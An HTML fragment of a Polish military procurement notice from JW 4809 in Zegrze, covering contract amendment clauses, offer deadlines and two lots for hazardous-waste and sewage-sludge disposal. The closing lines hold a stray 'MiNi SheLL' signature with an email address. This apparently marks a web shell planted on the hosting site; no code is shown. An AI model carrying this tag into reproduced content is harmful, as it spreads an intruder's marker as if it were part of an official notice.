<p>1.Projekt umowy stanowi załącznik nr 7 i 7a odpowiednio dla części zamówienia do SIWZ w wersji opracowanej przez Zamawiającego, z którą każdy Wykonawca powinien się zapoznać. Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na warunkach określonych w projekcie umowy.
2.Zamawiający zgodnie z art. 144 ustawy Pzp przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej:
Zamawiający dopuszcza zmiany podyktowane zmianą powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację umowy, w tym zmiany ustawowej stawki VAT. Wartość  należnego wynagrodzenia zostanie skorygowana o wartość należnego podatku VAT, zgodnie z obowiązującymi w tym zakresie przepisami prawa;
zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą,                    na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej:
o charakterze niezależnym od stron;
którego strony nie mogły przewidzieć przed zawarciem umowy;
którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności;
której nie można przypisać drugiej stronie; 
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki,ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia; 
gdy istnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron              nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z SIWZ i umową, lub zmiany te są korzystne dla Zamawiającego.
3.Powyższe zmiany wymagają zachowania formy pisemnej (w formie aneksu).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.26wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4809, ul. Juzistek 2, 05-131 Zegrze, budynek nr 220, sekcja zamówień publicznych pokój nr 319B..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.12.2014 godzina 10:00, miejsce: Jednostka Wojskowa 4809, ul. Juzistek 2, 05-131 Zegrze, budynek nr 220,  kancelaria jawna pokój nr 43..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odbiór, transport  i unieszkodliwienie lub odzysk odpadów niebezpiecznych i innych niż niebezpieczne z terenu kompleksów wojskowych administrowanych przez Jednostkę Wojskową 4809 w Zegrzu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia wraz z ilościami określa:
dla Części I - załącznik nr 2 - Formularz cenowy do SIWZ oraz wykaz ilości odpadów wraz z miejscem odbioru - załącznik nr 4 do umowy,
Podane w ww załącznikach ilości odpadów są ilościami szacunkowymi, które mogą ulec zmianie zmniejszeniu, natomiast rozliczane będą faktyczne ilości Mg odebranych ilości odpadów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin odbioru odpadów - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odbiór, transport  i unieszkodliwienie lub odzysk odpadów w postaci skratek kod odpadu 19 08 01, zawartości piaskowników kod odpadu 19 08 02
i osadów ściekowych  kod odpadu 19 08 05 z oczyszczalni ścieków zlokalizowanych na terenach kompleksów wojskowych Jednostki Wojskowej 4809 w Zegrzu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia wraz z ilościami określa:
dla Części II - załącznik nr 2a - Formularz cenowy oraz wykaz ilości odpadów wraz z miejscem odbioru - załącznik nr 4 do umowy.
Podane w w/w załącznikach ilości odpadów są ilościami szacunkowymi, które mogą ulec zmianie zmniejszeniu, natomiast rozliczane będą faktyczne ilości Mg odebranych ilości odpadów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin odbioru odpadów - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com